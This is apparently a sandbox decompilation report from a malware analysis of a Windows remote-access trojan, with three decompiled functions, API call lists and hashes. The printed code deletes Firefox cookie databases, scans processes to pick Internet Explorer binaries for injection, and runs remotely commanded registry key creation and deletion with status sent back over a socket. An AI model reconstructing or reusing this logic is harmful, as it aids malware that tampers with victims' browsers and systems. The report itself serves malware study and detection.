                    				void* _t107;
                    
                    				_t112 = __eflags;
                    				_t103 = __edi;
                    				E004020DF(_t68,  &_v52);
                    				E004020DF(_t68,  &_v28);
                    				_t30 = E00402093(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                    				E00401FE2( &_v28, _t31, _t104, E004052FD(_t68,  &_v76, E0043BA9A(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
                    				E00401FD8();
                    				E00401FD8();
                    				_t101 =  &_v28;
                    				_t105 = FindFirstFileA(E00401FAB(E00406B45( &_v100,  &_v28, _t106, "*")),  &_v444);
                    				E00401FD8();
                    				_t113 = _t105 - 0xffffffff;
                    				if(_t105 != 0xffffffff) {
                    					while(1) {
                    						__eflags = FindNextFileA(_t105,  &_v444);
                    						if(__eflags == 0) {
                    							break;
                    						}
                    						__eflags = _v444.dwFileAttributes & 0x00000010;
                    						if((_v444.dwFileAttributes & 0x00000010) == 0) {
                    							continue;
                    						} else {
                    							_t44 = E0043F6E0( &(_v444.cFileName), ".");
                    							__eflags = _t44;
                    							if(_t44 == 0) {
                    								continue;
                    							} else {
                    								_t46 = E0043F6E0( &(_v444.cFileName), "..");
                    								__eflags = _t46;
                    								if(_t46 == 0) {
                    									continue;
                    								} else {
                    									_t101 = E00406B45( &_v124,  &_v28, _t106,  &(_v444.cFileName));
                    									E00401FE2( &_v52, _t48, _t105, E00406383(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
                    									E00401FD8();
                    									E00401FD8();
                    									__eflags = DeleteFileA(E00401FAB( &_v52));
                    									if(__eflags != 0) {
                    										_t98 = _t107 - 0x18;
                    										_push("\n[Firefox cookies found, cleared!]");
                    										goto L2;
                    									} else {
                    										_t60 = GetLastError();
                    										__eflags = _t60 != 0;
                    										if(_t60 != 0) {
                    											FindClose(_t105);
                    											_t69 = 0;
                    										} else {
                    											continue;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						goto L11;
                    					}
                    					E00402093(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
                    					E0040C04D(_t68, _t101, _t106, __eflags);
                    					FindClose(_t105);
                    					goto L10;
                    				} else {
                    					FindClose(_t105);
                    					_t98 = _t107 - 0x18;
                    					_push("\n[Firefox Cookies not found]");
                    					L2:
                    					E00402093(_t68, _t98, _t101, _t106);
                    					E0040C04D(_t68, _t101, _t106, _t113);
                    					L10:
                    					_t69 = 1;
                    				}
                    				L11:
                    				E00401FD8();
                    				E00401FD8();
                    				return _t69;
                    			}
























                    0x0040bbac
                    0x0040bbac
                    0x0040bbba
                    0x0040bbc2
                    0x0040bbcf
                    0x0040bbef
                    0x0040bbf7
                    0x0040bbff
                    0x0040bc10
                    0x0040bc2d
                    0x0040bc2f
                    0x0040bc34
                    0x0040bc37
                    0x0040bcf6
                    0x0040bd04
                    0x0040bd06
                    0x00000000
                    0x00000000
                    0x0040bc60
                    0x0040bc67
                    0x00000000
                    0x0040bc6d
                    0x0040bc79
                    0x0040bc80
                    0x0040bc82
                    0x00000000
                    0x0040bc84
                    0x0040bc90
                    0x0040bc97
                    0x0040bc99
                    0x00000000
                    0x0040bc9b
                    0x0040bcb3
                    0x0040bcc2
                    0x0040bcca
                    0x0040bcd2
                    0x0040bce6
                    0x0040bce8
                    0x0040bd52
                    0x0040bd54
                    0x00000000
                    0x0040bcea
                    0x0040bcea
                    0x0040bcf1
                    0x0040bcf4
                    0x0040bd45
                    0x0040bd4b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040bcf4
                    0x0040bce8
                    0x0040bc99
                    0x0040bc82
                    0x00000000
                    0x0040bc67
                    0x0040bd16
                    0x0040bd1b
                    0x0040bd24
                    0x00000000
                    0x0040bc3d
                    0x0040bc3e
                    0x0040bc47
                    0x0040bc49
                    0x0040bc4e
                    0x0040bc4e
                    0x0040bc53
                    0x0040bd2a
                    0x0040bd2a
                    0x0040bd2a
                    0x0040bd2c
                    0x0040bd2f
                    0x0040bd37
                    0x0040bd43

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BC24
                    • FindClose.KERNEL32(00000000), ref: 0040BC3E
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCFE
                    • FindClose.KERNEL32(00000000), ref: 0040BD24
                    • FindClose.KERNEL32(00000000), ref: 0040BD45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 3527384056-432212279
                    • Opcode ID: 09a1e1e5996f8d845d3c42c60e61414877b257462102b7cefb0d1cc5e0e6cbb0
                    • Instruction ID: d9cfae435cd3475a09dd8c0caaa93bbf95bb297ef484dbdc982ffcb6782cbde5
                    • Opcode Fuzzy Hash: 09a1e1e5996f8d845d3c42c60e61414877b257462102b7cefb0d1cc5e0e6cbb0
                    • Instruction Fuzzy Hash: 4F417D7190461A9ADB14F7B6DC5ADEEB768AF10304F50017FF402B20E2EF385A46CA9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040F27D(void* __eflags, char _a4) {
                    				char _v0;
                    				void* _v8;
                    				char _v24;
                    				short _v524;
                    				char _v528;
                    				char _v540;
                    				char _v1060;
                    				char _v1088;
                    				void* _v1092;
                    				char _v1108;
                    				char _v1112;
                    				char _v1140;
                    				char _v1148;
                    				char _v1152;
                    				char _v1160;
                    				void* _v1164;
                    				char _v1172;
                    				char _v1184;
                    				void* _v1188;
                    				char _v1196;
                    				char _v1197;
                    				char _v1200;
                    				char _v1201;
                    				char _v1208;
                    				char _v1212;
                    				char _v1216;
                    				char _v1220;
                    				void* _v1224;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t70;
                    				void* _t77;
                    				void* _t78;
                    				char _t79;
                    				intOrPtr* _t106;
                    				void* _t112;
                    				void* _t116;
                    				void* _t130;
                    				void* _t187;
                    				void* _t200;
                    				void* _t201;
                    
                    				_t130 = 0;
                    				GetModuleFileNameW(0,  &_v524, 0x104);
                    				_t184 = "1";
                    				if(E004076ED("1") != 0) {
                    					L14:
                    					E00401F13( &_a4, _t184, _t196, E0041B11F( &_v1148, __eflags));
                    					E00401F09();
                    					_t70 = E00410F5E( &_v528,  &_v0);
                    					__eflags = _t70;
                    					if(_t70 == 0) {
                    						goto L15;
                    					}
                    				} else {
                    					E00401F86(0,  &_v1172);
                    					_t200 = CreateToolhelp32Snapshot(2, 0);
                    					_v1088 = 0x22c;
                    					_push( &_v1088);
                    					Process32FirstW(_t200);
                    					while(Process32NextW(_t200,  &_v1092) != 0) {
                    						E0040417E(_t130,  &_v1208, _t184, _t200,  &_v1060);
                    						_t106 = E00402305( &_v1212,  &_v1140);
                    						_t196 = E004022CA( &_v1216,  &_v1140);
                    						E00409B02( &_v1140,  *((intOrPtr*)(E00402305( &_v1220,  &_v1140))),  *_t108,  *_t106);
                    						_t201 = _t201 + 0xc;
                    						_t184 =  &_v24;
                    						_t112 = E0040B841( &_v24);
                    						__eflags = _t112;
                    						if(_t112 != 0) {
                    							E00401F13( &_v1184, _v1088, _t196, E0041BC72( &_v1160, _v1088));
                    							E00401F09();
                    							_t116 = E004076ED( &_v540);
                    							__eflags = _t116;
                    							if(_t116 == 0) {
                    								_t184 = 0x46b928;
                    								__eflags = E004076ED(0x46b928);
                    								if(__eflags != 0) {
                    									L12:
                    									E00401F09();
                    									L13:
                    									E00401F09();
                    									goto L14;
                    								} else {
                    									__eflags = E0041BA7A(_v1088);
                    									if(__eflags != 0) {
                    										goto L12;
                    									} else {
                    										E0040B7E1( &_v1184);
                    										E00401F09();
                    										break;
                    									}
                    								}
                    							} else {
                    								E00401F09();
                    								E00401F09();
                    							}
                    						} else {
                    							E00401F09();
                    							continue;
                    						}
                    						goto L22;
                    					}
                    					CloseHandle(_t200);
                    					_t184 = 0x46b928;
                    					if(E004076ED(0x46b928) != 0) {
                    						goto L13;
                    					} else {
                    						E00401F09();
                    						L15:
                    						CloseHandle( *0x471d44);
                    						E004020DF(_t130,  &_v1108);
                    						E00401F04(0x4742c0);
                    						E0041BF1A( &_v1108);
                    						_t77 = E00401FAB( &_v1108);
                    						_t78 = E00401F04( &_a4);
                    						_t187 = _t77;
                    						_t79 = E00417FFD(_t78);
                    						_v1197 = _t79;
                    						if(_t79 != 0) {
                    							L20:
                    							E00413425(0x4742d8, E00401FAB(0x4742d8), "Inj", 1);
                    							_t130 = _v1197;
                    						} else {
                    							E0040417E(_t130,  &_v1196, _t187, _t200, L"C:\\Program Files(x86)\\Internet Explorer\\");
                    							E00401FAB( &_v1112);
                    							_v1201 = E00417FFD(E00401F04(E00409082( &_v1152,  &_v1200, _t200, L"ieinstal.exe")));
                    							E00401F09();
                    							if(_v1201 != _t130) {
                    								L19:
                    								E00401F09();
                    								goto L20;
                    							} else {
                    								E00401FAB( &_v1108);
                    								_v1197 = E00417FFD(E00401F04(E00409082( &_v1148,  &_v1196, _t200, L"ielowutil.exe")));
                    								E00401F09();
                    								if(_v1197 != _t130) {
                    									goto L19;
                    								} else {
                    									E0040CE72();
                    									E00401F09();
                    								}
                    							}
                    						}
                    						E00401FD8();
                    					}
                    				}
                    				L22:
                    				E00401F09();
                    				return _t130;
                    			}













































                    0x0040f294
                    0x0040f297
                    0x0040f29d
                    0x0040f2b0
                    0x0040f437
                    0x0040f448
                    0x0040f451
                    0x0040f464
                    0x0040f469
                    0x0040f46b
                    0x00000000
                    0x00000000
                    0x0040f2b6
                    0x0040f2ba
                    0x0040f2c8
                    0x0040f2ca
                    0x0040f2dc
                    0x0040f2de
                    0x0040f354
                    0x0040f2f2
                    0x0040f300
                    0x0040f315
                    0x0040f32f
                    0x0040f334
                    0x0040f337
                    0x0040f342
                    0x0040f347
                    0x0040f349
                    0x0040f3ab
                    0x0040f3b4
                    0x0040f3c4
                    0x0040f3c9
                    0x0040f3cb
                    0x0040f3e4
                    0x0040f3f2
                    0x0040f3f4
                    0x0040f425
                    0x0040f429
                    0x0040f432
                    0x0040f432
                    0x00000000
                    0x0040f3f6
                    0x0040f402
                    0x0040f404
                    0x00000000
                    0x0040f406
                    0x0040f412
                    0x0040f41b
                    0x00000000
                    0x0040f41b
                    0x0040f404
                    0x0040f3cd
                    0x0040f3d1
                    0x0040f3da
                    0x0040f3da
                    0x0040f34b
                    0x0040f34f
                    0x00000000
                    0x0040f34f
                    0x00000000
                    0x0040f349
                    0x0040f36c
                    0x0040f372
                    0x0040f386
                    0x00000000
                    0x0040f38c
                    0x0040f38c
                    0x0040f471
                    0x0040f477
                    0x0040f481
                    0x0040f48b
                    0x0040f496
                    0x0040f49f
                    0x0040f4ad
                    0x0040f4b2
                    0x0040f4b6
                    0x0040f4bb
                    0x0040f4c1
                    0x0040f570
                    0x0040f583
                    0x0040f588
                    0x0040f4c7
                    0x0040f4d0
                    0x0040f4d9
                    0x0040f507
                    0x0040f50b
                    0x0040f514
                    0x0040f567
                    0x0040f56b
                    0x00000000
                    0x0040f516
                    0x0040f51a
                    0x0040f548
                    0x0040f54c
                    0x0040f555
                    0x00000000
                    0x0040f557
                    0x0040f557
                    0x0040f560
                    0x0040f560
                    0x0040f555
                    0x0040f514
                    0x0040f592
                    0x0040f592
                    0x0040f386
                    0x0040f597
                    0x0040f59e
                    0x0040f5af

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,X2},?,00474320), ref: 0040F297
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F2C2
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F2DE
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F35D
                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00474320), ref: 0040F36C
                      • Part of subcall function 0041BC72: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041BC8A
                      • Part of subcall function 0041BC72: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041BC9D
                    • CloseHandle.KERNEL32(00000000,?,00474320), ref: 0040F477
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$X2}$ieinstal.exe$ielowutil.exe
                    • API String ID: 3756808967-2050040349
                    • Opcode ID: b65ca6435be654d0ecdb98e42585d0212ad6530d8475c8e6913c1823301f53cd
                    • Instruction ID: f65af49143fcdfdc00c6025c3deca8cb2350af4a9afbb8975d95c1056d824fb4
                    • Opcode Fuzzy Hash: b65ca6435be654d0ecdb98e42585d0212ad6530d8475c8e6913c1823301f53cd
                    • Instruction Fuzzy Hash: C6713D705083419AC724EF61D8519AFB7A4AF90348F50483FF586631E2EF78994DCB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00413AA0(void* __edx, void* __eflags, char _a8) {
                    				char _v36;
                    				char _v48;
                    				char _v52;
                    				void* _v60;
                    				char _v68;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				char _v104;
                    				char _v108;
                    				struct _SECURITY_ATTRIBUTES _v112;
                    				void* _v120;
                    				char _v128;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t75;
                    				void* _t86;
                    				void* _t97;
                    				void* _t99;
                    				void* _t100;
                    				void* _t102;
                    				void* _t103;
                    				void* _t111;
                    				void* _t118;
                    				void* _t119;
                    				void* _t121;
                    				void* _t125;
                    				void* _t130;
                    				void* _t136;
                    				void* _t140;
                    				void* _t145;
                    				void* _t151;
                    				void* _t153;
                    				void* _t154;
                    				void* _t156;
                    				void* _t157;
                    				void* _t163;
                    				void* _t165;
                    				void* _t166;
                    				void* _t168;
                    				void* _t174;
                    				void* _t176;
                    				void* _t177;
                    				void* _t179;
                    				void* _t184;
                    				void* _t185;
                    				long _t188;
                    				void* _t195;
                    				void* _t207;
                    				void* _t209;
                    				void* _t220;
                    				void* _t236;
                    				void* _t250;
                    				signed int _t327;
                    				void* _t330;
                    				void* _t332;
                    				void* _t337;
                    				void* _t339;
                    				void* _t341;
                    				signed int _t342;
                    				void* _t344;
                    				void* _t351;
                    				signed int _t352;
                    				void* _t355;
                    				void* _t356;
                    				void* _t357;
                    				void* _t360;
                    				void* _t365;
                    				void* _t366;
                    				void* _t368;
                    				void* _t369;
                    				void* _t371;
                    				void* _t373;
                    				void* _t374;
                    				void* _t376;
                    				void* _t378;
                    				void* _t380;
                    				void* _t385;
                    
                    				_t385 = __eflags;
                    				_t325 = __edx;
                    				_push(_t207);
                    				_t75 = E00401FAB( &_a8);
                    				_push(0xffffffff);
                    				_t330 = 4;
                    				_push(_t330);
                    				_push( &_v52);
                    				E004041A2( &_a8);
                    				_t355 = (_t352 & 0xfffffff8) - 0x4c;
                    				E004020F6(_t207, _t355, __edx, _t385, 0x473ec8);
                    				_t356 = _t355 - 0x18;
                    				E004020F6(_t207, _t356, __edx, _t385,  &_v68);
                    				E0041B8B0( &_v108, __edx);
                    				_t357 = _t356 + 0x30;
                    				_t337 =  *_t75 - 0x35;
                    				if(_t337 == 0) {
                    					E00401F86(_t207,  &_v76);
                    					__eflags = E004021FA( &_v88) - 1;
                    					if(__eflags > 0) {
                    						L00408F7E(_t207,  &_v80, _t325, E00401FAB(E00401E65( &_v88, _t325, _t351, __eflags, 1)));
                    					}
                    					E004020F6(_t207, _t357 - 0x18, _t325, __eflags, E00401E65( &_v88, _t325, _t351, __eflags, 0));
                    					_t86 = E00401F04( &_v84);
                    					_t325 = 1;
                    					_t220 = _t86;
                    					L33:
                    					E004138BB(_t220, _t325, _t392);
                    					L34:
                    					E00401F09();
                    					L35:
                    					E00401E8D( &_v88, _t325);
                    					E00401FD8();
                    					E00401FD8();
                    					return 0;
                    				}
                    				_t339 = _t337 - 1;
                    				if(_t339 == 0) {
                    					_t97 = E00401FAB(E00401E65( &_v88, __edx, _t351, __eflags, 2));
                    					_t99 = E00401FAB(E00401E65( &_v92, __edx, _t351, __eflags, 1));
                    					_t332 = 0;
                    					_t100 = E00401E65( &_v96, __edx, _t351, __eflags, 0);
                    					_t360 = _t357 - 0x18;
                    					E004020F6(_t207, _t360, _t325, __eflags, _t100);
                    					_t102 = E0041382A(_t207, __eflags, _t97);
                    					_t325 = _t99;
                    					_t103 = E004135D1(_t102, _t99);
                    					_t362 = _t360 + 0x18 - 0x18;
                    					_t236 = _t360 + 0x18 - 0x18;
                    					__eflags = _t103;
                    					if(__eflags == 0) {
                    						_push("2");
                    						L29:
                    						E00402093(_t207, _t236, _t325, _t351);
                    						E00404AA1(0x4744e0, _t325, __eflags);
                    						goto L35;
                    					}
                    					_push("1");
                    					L18:
                    					E00402093(_t207, _t236, _t325, _t351);
                    					E00404AA1(0x4744e0, _t325, __eflags);
                    					E004020F6(_t207, _t362 - 0x18, _t325, __eflags, E00401E65( &_v120, _t325, _t351, __eflags, _t332));
                    					_t111 = E00401FAB(E00401E65( &_v128, _t325, _t351, __eflags, 1));
                    					_t325 = 0;
                    					E004138BB(_t111, 0, __eflags);
                    					goto L35;
                    				}
                    				_t341 = _t339 - 1;
                    				if(_t341 == 0) {
                    					E0040417E(_t207,  &_v80, __edx, _t351, E00401FAB(E00401E65( &_v88, __edx, _t351, __eflags, 1)));
                    					 *0x471d80 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                    					_t118 = E00401F04( &_v84);
                    					_t119 = E00401E65( &_v96, _t325, _t351, __eflags, 0);
                    					_t365 = _t357 - 0x18;
                    					E004020F6(_t207, _t365, _t325, __eflags, _t119);
                    					_t121 = E0041382A(_t207, __eflags, _t118);
                    					_t366 = _t365 + 0x18;
                    					__eflags =  *0x471d80(_t121);
                    					if(__eflags != 0) {
                    						_t250 = _t366 - 0x18;
                    						_push("9");
                    					} else {
                    						_t125 = E0040247C();
                    						_t342 = 2;
                    						_t207 = E004140D7( &_v84, "\\", _t125 - _t342);
                    						__eflags = _t207 - 0xffffffff;
                    						if(__eflags != 0) {
                    							_t51 = _t207 + 1; // 0x1
                    							_t130 = E004341B6( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
                    							E0043F1E4(_t130, E00401F04(E00408F35( &_v84,  &_v36, 0, _t207)));
                    							E00401F09();
                    							_t136 = E00401E65( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
                    							_t368 = _t366 - 0x18;
                    							E004020F6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
                    							_t325 = 0;
                    							__eflags = 0;
                    							E004138BB(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
                    							E004341BF(_t130);
                    							_t369 = _t368 + 0x1c;
                    						} else {
                    							_t140 = E00401E65( &_v96, _t325, _t351, __eflags, 0);
                    							_t371 = _t366 - 0x18;
                    							E004020F6(_t207, _t371, _t325, __eflags, _t140);
                    							_t325 = 0;
                    							E004138BB(0, 0, __eflags);
                    							_t369 = _t371 + 0x18;
                    						}
                    						_t250 = _t369 - 0x18;
                    						_push("8");
                    					}
                    					L10:
                    					E00402093(_t207, _t250, _t325, _t351);
                    					E00404AA1(0x4744e0, _t325, __eflags);
                    					goto L34;
                    				}
                    				_t344 = _t341 - 1;
                    				if(_t344 == 0) {
                    					_t145 = E0043B4A1(_t143, E00401FAB(E00401E65( &_v88, __edx, _t351, __eflags, 3)));
                    					__eflags = _t145 - _t330;
                    					if(__eflags == 0) {
                    						E00436320( &_v108, E00401FAB(E00401E65( &_v92, __edx, _t351, __eflags, _t330)), _t330);
                    						_push(_v108);
                    						_t151 = E00401FAB(E00401E65( &_v92, _t325, _t351, __eflags, 2));
                    						_t153 = E00401FAB(E00401E65( &_v96, _t325, _t351, __eflags, 1));
                    						_t332 = 0;
                    						__eflags = 0;
                    						_t154 = E00401E65( &_v100, _t325, _t351, 0, 0);
                    						_t373 = _t357 + 0xc - 0x18;
                    						E004020F6(_t207, _t373, _t325, __eflags, _t154);
                    						_t156 = E0041382A(_t207, __eflags, _t151);
                    						_t374 = _t373 + 0x18;
                    						_t325 = _t153;
                    						_t157 = E0041346D(_t156, _t153);
                    					} else {
                    						__eflags = _t145 - 0xb;
                    						if(__eflags == 0) {
                    							E00436320( &_v104, E00401FAB(E00401E65( &_v92, __edx, _t351, __eflags, _t330)), 8);
                    							_t163 = E00401FAB(E00401E65( &_v92, _t325, _t351, __eflags, 2));
                    							_t165 = E00401FAB(E00401E65( &_v96, _t325, _t351, __eflags, 1));
                    							_t332 = 0;
                    							_t166 = E00401E65( &_v100, _t325, _t351, __eflags, 0);
                    							_t376 = _t357 + 0xc - 0x18;
                    							E004020F6(_t207, _t376, _t325, __eflags, _t166);
                    							_t168 = E0041382A(_t207, __eflags, _t163);
                    							_t325 = _t165;
                    							_t157 = E004134B1(_t168, _t165, _v104, _v100);
                    							_t374 = _t376 + 0x24;
                    						} else {
                    							_push(_t145);
                    							E00401E65( &_v92, __edx, _t351, __eflags, _t330);
                    							_push(E0040247C());
                    							_push(E00401FAB(E00401E65( &_v92, __edx, _t351, __eflags, _t330)));
                    							_t174 = E00401FAB(E00401E65( &_v96, _t325, _t351, __eflags, 2));
                    							_t176 = E00401FAB(E00401E65( &_v100, _t325, _t351, __eflags, 1));
                    							_t332 = 0;
                    							_t177 = E00401E65( &_v104, _t325, _t351, __eflags, 0);
                    							_t378 = _t357 - 0x18;
                    							E004020F6(_t207, _t378, _t325, __eflags, _t177);
                    							_t179 = E0041382A(_t207, __eflags, _t174);
                    							_t325 = _t176;
                    							_t157 = E0041337E(_t179, _t176);
                    							_t374 = _t378 + 0x28;
                    						}
                    					}
                    					_t362 = _t374 - 0x18;
                    					_t236 = _t374 - 0x18;
                    					__eflags = _t157;
                    					if(__eflags == 0) {
                    						_push("5");
                    						goto L29;
                    					} else {
                    						_push("4");
                    						goto L18;
                    					}
                    				}
                    				_t390 = _t344 != 1;
                    				if(_t344 != 1) {
                    					goto L35;
                    				}
                    				E0040417E(_t207,  &_v80, __edx, _t351, E00401FAB(E00401E65( &_v88, __edx, _t351, _t390, 1)));
                    				_t184 = E00401F04( &_v84);
                    				_t185 = E00401E65( &_v96, __edx, _t351, _t390, 0);
                    				_t380 = _t357 - 0x18;
                    				E004020F6(_t207, _t380, _t325, _t390, _t185);
                    				_t188 = RegCreateKeyExW(E0041382A(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
                    				_t349 = _t188;
                    				RegCloseKey(_v120);
                    				_t382 = _t380 + 0x18 - 0x18;
                    				_t250 = _t380 + 0x18 - 0x18;
                    				_t391 = _t188;
                    				if(_t188 != 0) {
                    					_push("7");
                    					goto L10;
                    				}
                    				E00402093(_t207, _t250, _t325, _t351, "6");
                    				_push(0x72);
                    				E00404AA1(0x4744e0, _t325, _t391);
                    				_t209 = E00408F4F( &_v108, 0x4744e0, 0x4744e0);
                    				_t392 = _t209 - 0xffffffff;
                    				if(_t209 != 0xffffffff) {
                    					_t14 = _t209 + 1; // 0x1
                    					_t327 = 2;
                    					_t195 = E004341B6( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
                    					E0043F1E4(_t195, E00401F04(E00408F35( &_v96,  &_v48, 0, _t209)));
                    					E00401F09();
                    					E004020F6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E65( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
                    					_t325 = 0;
                    					E004138BB(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
                    					E004341BF(_t195);
                    					goto L34;
                    				} else {
                    					E004020F6(_t209, _t382 - 0x18, _t325, _t392, E00401E65( &_v108, _t325, _t351, _t392, 0));
                    					_t325 = 0;
                    					_t220 = 0;
                    					goto L33;
                    				}
                    			}






















































































                    0x00413aa0
                    0x00413aa0
                    0x00413aac
                    0x00413aaf
                    0x00413ab4
                    0x00413ab8
                    0x00413abe
                    0x00413ac3
                    0x00413ac4
                    0x00413ac9
                    0x00413ad3
                    0x00413ad8
                    0x00413ae2
                    0x00413aeb
                    0x00413af0
                    0x00413af3
                    0x00413af6
                    0x0041400c
                    0x0041401a
                    0x0041401d
                    0x00414036
                    0x00414036
                    0x0041404c
                    0x00414055
                    0x0041405a
                    0x0041405c
                    0x0041405e
                    0x0041405e
                    0x00414066
                    0x0041406a
                    0x0041406f
                    0x00414073
                    0x0041407c
                    0x00414084
                    0x00414091
                    0x00414091
                    0x00413afc
                    0x00413aff
                    0x00413f9a
                    0x00413fad
                    0x00413fb2
                    0x00413fbb
                    0x00413fc0
                    0x00413fc6
                    0x00413fcb
                    0x00413fd3
                    0x00413fd7
                    0x00413fdd
                    0x00413fe0
                    0x00413fe2
                    0x00413fe4
                    0x00413ff0
                    0x00413ff5
                    0x00413ff5
                    0x00414001
                    0x00000000
                    0x00414001
                    0x00413fe6
                    0x00413dfe
                    0x00413dfe
                    0x00413e0a
                    0x00413e1f
                    0x00413e31
                    0x00413e36
                    0x00413e3a
                    0x00000000
                    0x00413e3f
                    0x00413b05
                    0x00413b08
                    0x00413e68
                    0x00413e88
                    0x00413e8d
                    0x00413e9a
                    0x00413e9f
                    0x00413ea5
                    0x00413eaa
                    0x00413eaf
                    0x00413eb9
                    0x00413ebb
                    0x00413f81
                    0x00413f83
                    0x00413ec1
                    0x00413ec5
                    0x00413ecc
                    0x00413ede
                    0x00413ee0
                    0x00413ee3
                    0x00413f0a
                    0x00413f17
                    0x00413f38
                    0x00413f43
                    0x00413f4d
                    0x00413f52
                    0x00413f58
                    0x00413f5d
                    0x00413f5d
                    0x00413f61
                    0x00413f67
                    0x00413f6c
                    0x00413ee5
                    0x00413eea
                    0x00413eef
                    0x00413ef5
                    0x00413efa
                    0x00413efe
                    0x00413f03
                    0x00413f03
                    0x00413f72
                    0x00413f74
                    0x00413f74
                    0x00413c4e
                    0x00413c4e
                    0x00413c5a
                    0x00000000
                    0x00413c5a
                    0x00413b0e
                    0x00413b11
                    0x00413c77
                    0x00413c81
                    0x00413c83
                    0x00413d93
                    0x00413d9f
                    0x00413dac
                    0x00413dbf
                    0x00413dc4
                    0x00413dc4
                    0x00413dcd
                    0x00413dd2
                    0x00413dd8
                    0x00413ddd
                    0x00413de2
                    0x00413de5
                    0x00413de9
                    0x00413c89
                    0x00413c89
                    0x00413c8c
                    0x00413d1b
                    0x00413d38
                    0x00413d4b
                    0x00413d50
                    0x00413d59
                    0x00413d5e
                    0x00413d64
                    0x00413d69
                    0x00413d71
                    0x00413d75
                    0x00413d7a
                    0x00413c8e
                    0x00413c8e
                    0x00413c90
                    0x00413c9c
                    0x00413cae
                    0x00413cbc
                    0x00413ccf
                    0x00413cd4
                    0x00413cdd
                    0x00413ce2
                    0x00413ce8
                    0x00413ced
                    0x00413cf5
                    0x00413cf9
                    0x00413cfe
                    0x00413cfe
                    0x00413c8c
                    0x00413df0
                    0x00413df3
                    0x00413df5
                    0x00413df7
                    0x00413e47
                    0x00000000
                    0x00413df9
                    0x00413df9
                    0x00000000
                    0x00413df9
                    0x00413df7
                    0x00413b17
                    0x00413b1a
                    0x00000000
                    0x00000000
                    0x00413b37
                    0x00413b51
                    0x00413b5c
                    0x00413b61
                    0x00413b67
                    0x00413b75
                    0x00413b7f
                    0x00413b81
                    0x00413b87
                    0x00413b8a
                    0x00413b8c
                    0x00413b8e
                    0x00413c49
                    0x00000000
                    0x00413c49
                    0x00413b99
                    0x00413b9e
                    0x00413ba5
                    0x00413bb5
                    0x00413bb7
                    0x00413bba
                    0x00413bdc
                    0x00413be1
                    0x00413bec
                    0x00413c0d
                    0x00413c18
                    0x00413c2d
                    0x00413c32
                    0x00413c36
                    0x00413c3c
                    0x00000000
                    0x00413bbc
                    0x00413bcc
                    0x00413bd1
                    0x00413bd3
                    0x00000000
                    0x00413bd3

                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413B75
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413B81
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00413E77
                    • GetProcAddress.KERNEL32(00000000), ref: 00413E7E
                    Strings
                    Memory Dump Source
